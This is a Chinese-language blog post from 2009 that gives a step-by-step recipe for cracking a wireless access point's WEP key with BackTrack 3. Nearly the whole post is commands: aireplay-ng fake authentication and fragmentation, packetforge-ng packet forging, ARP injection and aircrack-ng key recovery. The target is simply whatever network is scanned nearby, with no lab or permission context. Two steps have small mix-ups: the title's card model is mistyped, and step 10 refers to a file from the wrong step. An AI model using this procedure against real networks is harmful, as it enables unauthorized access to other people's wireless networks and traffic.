2009年3月26日星期四

Intel 394ABG attack wep wireless ap with back track3

1、用BT3启动,使用KDE。

2、modprobe -r iwl3945

3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块,第一步是卸载原有模块,第二步是加载新模块

4、先使用Airoscript查看可用的无线网络
在菜单上我是没找到,可以直接在命令行输入:
/usr/local/wicrawl/plugins/aircrack-wep-cracking/aircrack-ng-0.9.1/airoscript/airoscript.sh

  确定攻击对象 的SSID channel,和mac 地址

5、打开新窗口,输入以下:
airodump-ng --ivs -w outputs -c 6 wifi0
注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号

6、打开新窗口,输入以下
aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0

ESSID是目标网络的ESSID,
APMAC是目标AP的MAC
LOCALMAC是本地网卡的MAC,

MAC地址的输入格式是 00:00:00:00:00:00 用冒号分割

7、生成XOR文件用于向目标AP发送攻击包
aireplay-ng -5 -b APMAC -h LOCALMAC wifi0
出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件, 名称类似fragment-xxxx.xor

8、准备发送攻击包
packetforge-ng -0 -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp

注:上面的 -0 是数字0 -l是L的小写,.xor就是第7步生成的文件。

9、发送攻击包
aireplay-ng -2 -r mrarp -x 1024 wifi0
1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。


10、当步骤4中的对应的AP的DATA栏目的数字增长至3万左右时,开新窗口,输入以下:
aircrack-ng -n 64 -b APMAC outputs-0.ivs
注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。

最后会提示 16进制和对应的ACSII字符的密码

没有评论: